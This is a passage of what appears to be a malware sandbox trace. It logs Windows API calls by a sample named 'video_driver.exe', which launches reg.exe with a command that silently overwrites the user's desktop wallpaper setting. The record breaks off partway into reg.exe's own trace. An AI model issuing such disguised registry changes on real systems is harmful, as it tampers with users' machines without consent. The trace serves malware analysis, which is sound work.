[0039.640] GetProcessHeap () returned 0x710000 [0039.640] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x400e) returned 0x726380 [0039.640] GetProcessHeap () returned 0x710000 [0039.640] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xf0) returned 0x710ff0 [0039.641] GetProcessHeap () returned 0x710000 [0039.641] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x726380 | out: hHeap=0x710000) returned 1 [0039.641] GetConsoleOutputCP () returned 0x1b5 [0039.641] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4b4260 | out: lpCPInfo=0x4a4b4260) returned 1 [0039.641] GetUserDefaultLCID () returned 0x409 [0039.642] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a4b4950, cchData=8 | out: lpLCData=":") returned 2 [0039.642] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf898, cchData=128 | out: lpLCData="0") returned 2 [0039.642] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf898, cchData=128 | out: lpLCData="0") returned 2 [0039.642] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf898, cchData=128 | out: lpLCData="1") returned 2 [0039.642] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a4b4940, cchData=8 | out: lpLCData="/") returned 2 [0039.642] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a4b4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0039.643] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a4b4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0039.643] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a4b4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0039.643] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a4b4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0039.643] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a4b4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0039.643] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a4b4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0039.643] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a4b4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0039.643] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a4b4930, cchData=8 | out: lpLCData=".") returned 2 [0039.643] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a4b4920, cchData=8 | out: lpLCData=",") returned 2 [0039.643] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0039.644] GetProcessHeap () returned 0x710000 [0039.644] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x20c) returned 0x722ed0 [0039.644] GetConsoleTitleW (in: lpConsoleTitle=0x722ed0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0039.645] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.645] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0039.645] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0039.645] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0039.645] GetProcessHeap () returned 0x710000 [0039.645] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x400a) returned 0x726380 [0039.646] GetProcessHeap () returned 0x710000 [0039.646] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x4008) returned 0x72a398 [0039.646] GetProcessHeap () returned 0x710000 [0039.646] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x20) returned 0x710830 [0039.646] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x4a4c0640, nSize=0x2000 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0039.646] GetProcessHeap () returned 0x710000 [0039.646] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x710830 | out: hHeap=0x710000) returned 1 [0039.646] GetProcessHeap () returned 0x710000 [0039.646] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x72a398 | out: hHeap=0x710000) returned 1 [0039.646] GetProcessHeap () returned 0x710000 [0039.646] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x726380 | out: hHeap=0x710000) returned 1 [0039.646] _wcsicmp (_String1="reg", _String2=")") returned 73 [0039.646] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0039.646] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0039.647] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0039.647] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0039.647] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0039.647] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0039.647] GetProcessHeap () returned 0x710000 [0039.647] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x58) returned 0x7110e8 [0039.647] GetProcessHeap () returned 0x710000 [0039.647] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x10) returned 0x720038 [0039.650] GetProcessHeap () returned 0x710000 [0039.650] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x106) returned 0x711148 [0039.651] GetConsoleTitleW (in: lpConsoleTitle=0x2cf590, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0039.651] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0039.652] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0039.652] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0039.652] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0039.652] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0039.652] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0039.652] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0039.652] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0039.652] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0039.652] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0039.652] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0039.652] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0039.652] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0039.652] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0039.652] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0039.652] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0039.652] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0039.652] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0039.652] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0039.652] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0039.652] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0039.652] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0039.652] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0039.652] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0039.652] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0039.652] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0039.652] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0039.652] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0039.652] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0039.652] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0039.652] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0039.652] _wcsicmp (_String1="reg", _String2="START") returned -1 [0039.652] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0039.652] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0039.652] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0039.653] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0039.653] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0039.653] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0039.653] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0039.653] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0039.653] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0039.653] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0039.653] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0039.653] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0039.653] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0039.653] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0039.653] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0039.653] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0039.653] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0039.653] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0039.653] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0039.653] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0039.653] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0039.653] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0039.653] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0039.653] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0039.653] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0039.653] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0039.653] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0039.653] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0039.653] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0039.653] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0039.653] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0039.653] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0039.653] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0039.653] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0039.653] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0039.653] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0039.653] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0039.654] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0039.654] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0039.654] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0039.654] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0039.654] _wcsicmp (_String1="reg", _String2="START") returned -1 [0039.654] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0039.654] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0039.654] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0039.654] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0039.654] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0039.654] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0039.654] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0039.654] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0039.654] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0039.654] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0039.654] _wcsicmp (_String1="reg", _String2="FOR") returned 12 [0039.654] _wcsicmp (_String1="reg", _String2="IF") returned 9 [0039.654] _wcsicmp (_String1="reg", _String2="REM") returned -6 [0039.654] GetProcessHeap () returned 0x710000 [0039.654] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x210) returned 0x7230e8 [0039.654] GetProcessHeap () returned 0x710000 [0039.654] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x10e) returned 0x723300 [0039.654] _wcsnicmp (_String1="reg", _String2="cmd ", _MaxCount=0x4) returned 15 [0039.654] GetProcessHeap () returned 0x710000 [0039.654] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x418) returned 0x724200 [0039.655] SetErrorMode (uMode=0x0) returned 0x0 [0039.655] SetErrorMode (uMode=0x1) returned 0x0 [0039.655] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x724208, lpFilePart=0x2cf0b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf0b0*="Desktop") returned 0x25 [0039.655] SetErrorMode (uMode=0x0) returned 0x1 [0039.655] GetProcessHeap () returned 0x710000 [0039.655] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x724200, Size=0x5c) returned 0x724200 [0039.655] GetProcessHeap () returned 0x710000 [0039.655] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x724200) returned 0x5c [0039.655] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a4c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0039.655] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0039.655] GetProcessHeap () returned 0x710000 [0039.655] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x120) returned 0x723418 [0039.655] GetProcessHeap () returned 0x710000 [0039.655] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x238) returned 0x724268 [0039.663] GetProcessHeap () returned 0x710000 [0039.663] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x724268, Size=0x122) returned 0x724268 [0039.663] GetProcessHeap () returned 0x710000 [0039.663] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x724268) returned 0x122 [0039.663] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a4c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.663] GetProcessHeap () returned 0x710000 [0039.663] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xe0) returned 0x723540 [0039.663] GetProcessHeap () returned 0x710000 [0039.664] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x723540, Size=0x76) returned 0x723540 [0039.664] GetProcessHeap () returned 0x710000 [0039.664] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x723540) returned 0x76 [0039.664] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.665] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x2cee2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee2c) returned 0xffffffff [0039.665] GetLastError () returned 0x2 [0039.665] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\reg", fInfoLevelId=0x1, lpFindFileData=0x2cee2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee2c) returned 0xffffffff [0039.665] GetLastError () returned 0x2 [0039.666] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.666] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x2cee2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee2c) returned 0x711258 [0039.666] GetProcessHeap () returned 0x710000 [0039.666] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x14) returned 0x711298 [0039.666] FindClose (in: hFindFile=0x711258 | out: hFindFile=0x711258) returned 1 [0039.666] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x2cee2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee2c) returned 0xffffffff [0039.666] GetLastError () returned 0x2 [0039.666] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cee2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee2c) returned 0x711258 [0039.666] GetProcessHeap () returned 0x710000 [0039.666] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x711298, Size=0x4) returned 0x711298 [0039.666] FindClose (in: hFindFile=0x711258 | out: hFindFile=0x711258) returned 1 [0039.666] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0039.666] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0039.667] GetConsoleTitleW (in: lpConsoleTitle=0x2cf324, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0039.667] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf1ac, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf274 | out: lpAttributeList=0x2cf1ac, lpSize=0x2cf274) returned 1 [0039.667] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf1ac, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf26c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf1ac, lpPreviousValue=0x0) returned 1 [0039.667] GetStartupInfoW (in: lpStartupInfo=0x2cf168 | out: lpStartupInfo=0x2cf168*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x13, lpReserved2=0x711a74, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0039.667] GetProcessHeap () returned 0x710000 [0039.667] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x18) returned 0x7112a8 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0039.667] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0039.668] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0039.668] GetProcessHeap () returned 0x710000 [0039.668] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7112a8 | out: hHeap=0x710000) returned 1 [0039.668] GetProcessHeap () returned 0x710000 [0039.669] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xa) returned 0x720050 [0039.669] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0039.670] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\new_background.bmp\" /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2cf208*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\new_background.bmp\" /f", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf254 | out: lpCommandLine="reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\new_background.bmp\" /f", lpProcessInformation=0x2cf254*(hProcess=0x78, hThread=0x74, dwProcessId=0x434, dwThreadId=0x7a8)) returned 1 [0039.676] CloseHandle (hObject=0x74) returned 1 [0039.677] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0039.677] GetProcessHeap () returned 0x710000 [0039.677] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x725840 | out: hHeap=0x710000) returned 1 [0039.677] GetEnvironmentStringsW () returned 0x724508* [0039.677] GetProcessHeap () returned 0x710000 [0039.677] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xb36) returned 0x725048 [0039.677] FreeEnvironmentStringsW (penv=0x724508) returned 1 [0039.677] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0039.903] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2cf148 | out: lpExitCode=0x2cf148*=0x0) returned 1 [0039.903] CloseHandle (hObject=0x78) returned 1 [0039.904] _vsnwprintf (in: _Buffer=0x2cf290, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf154 | out: _Buffer="00000000") returned 8 [0039.904] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0039.904] GetProcessHeap () returned 0x710000 [0039.904] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x725048 | out: hHeap=0x710000) returned 1 [0039.904] GetEnvironmentStringsW () returned 0x724508* [0039.904] GetProcessHeap () returned 0x710000 [0039.904] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xb5c) returned 0x725070 [0039.904] FreeEnvironmentStringsW (penv=0x724508) returned 1 [0039.904] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0039.904] GetProcessHeap () returned 0x710000 [0039.905] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x725070 | out: hHeap=0x710000) returned 1 [0039.905] GetEnvironmentStringsW () returned 0x724508* [0039.905] GetProcessHeap () returned 0x710000 [0039.905] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xb5c) returned 0x725070 [0039.905] FreeEnvironmentStringsW (penv=0x724508) returned 1 [0039.905] GetProcessHeap () returned 0x710000 [0039.905] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x720050 | out: hHeap=0x710000) returned 1 [0039.905] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf1ac | out: lpAttributeList=0x2cf1ac) [0039.905] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.905] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0039.905] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.905] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4b41ac | out: lpMode=0x4a4b41ac) returned 1 [0039.906] _get_osfhandle (_FileHandle=0) returned 0x3 [0039.906] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4b41b0 | out: lpMode=0x4a4b41b0) returned 1 [0039.906] SetConsoleInputExeNameW () returned 0x1 [0039.906] GetConsoleOutputCP () returned 0x1b5 [0039.906] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4b4260 | out: lpCPInfo=0x4a4b4260) returned 1 [0039.906] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.906] exit (_Code=0) Process: id = "8" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0x4a15e000" os_pid = "0x434" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x67c" cmd_line = "reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\new_background.bmp\" /f" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 8 os_tid = 0x7a8 [0039.749] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x23fd14 | out: lpSystemTimeAsFileTime=0x23fd14*(dwLowDateTime=0xfe5a8c60, dwHighDateTime=0x1d623ff)) [0039.749] GetCurrentProcessId () returned 0x434 [0039.749] GetCurrentThreadId () returned 0x7a8 [0039.749] GetTickCount () returned 0x1145265 [0039.749] QueryPerformanceCounter (in: lpPerformanceCount=0x23fd0c | out: lpPerformanceCount=0x23fd0c*=15988276740) returned 1 [0039.750] GetModuleHandleA (lpModuleName=0x0) returned 0x920000 [0039.750] __set_app_type (_Type=0x1) [0039.750] __p__fmode () returned 0x770331f4 [0039.750] __p__commode () returned 0x770331fc [0039.750] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x92d4f9) returned 0x0 [0039.751] __wgetmainargs (in: _Argc=0x92f030, _Argv=0x92f038, 